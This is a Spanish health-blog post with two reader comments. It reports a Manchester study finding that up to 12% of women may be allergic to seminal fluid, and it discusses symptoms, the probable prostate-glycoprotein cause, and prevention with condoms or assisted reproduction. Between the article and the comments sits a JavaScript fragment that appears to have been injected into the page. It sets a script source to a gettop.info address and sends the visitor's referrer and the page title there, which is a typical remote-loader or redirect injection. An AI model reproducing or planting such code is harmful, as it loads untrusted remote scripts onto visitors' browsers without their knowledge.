Salud y belleza » Enfermedades, Salud, Salud sexual

La alergia al semen, un problema real

2 Comentarios

Según los resultados obtenidos en un nuevo estudio realizado en la Universidad Metropolitana de Manchester (Reino Unido) y publicado en una revista de prestigio, hasta un 12% de las mujeres podrían tener alergia al semen. Además, en algunos casos esa alergia podría llegar a provocar incluso la muerte.

alergia-semen

Los resultados desvelan que el grupo de mujeres más afectadas por esta alergia son las que tienen una edad comprendida entre los 20 y los 30 años. A menudo, los síntomas suelen confundirse con una dermatitis o con alguna enfermedad de transmisión sexual. Pero en realidad se trataría de una hipersensibilidad al semen humano que puede llegar a causar incluso un shock anafiláctico con grave riesgo de muerte.

alergia-al-semenLa causa de esta alergia parece ser un componente del fluido seminal, probablemente alguna glicoproteína de la próstata, y no realmente a los espermatozoides. Esto quiere decir que la mujer que es alérgica al semen lo es a todos, no solo al de un hombre.

Para prevenir o erradicar esta alergia lo lógico sería usar preservativo. En el caso de que haya riesgos muy graves, como de shock anafiláctico, la pareja que quisiera tener hijos podría recurrir a la reproducción asistida en la que se separan los espermatozoides del resto de fluidos, por lo que no habría reacción.

¿Tienes alergia al semen? ¿Cómo te la diagnosticaron?

if (document.currentScript) { s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , ,

2 Comments »

  • india said:

    no sabía que era real… menos mal que no lo tengo, tiene que ser muy duro, tanto para la que sufre como para su pareja.

  • paola said:

    cuales son los síntomas?

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.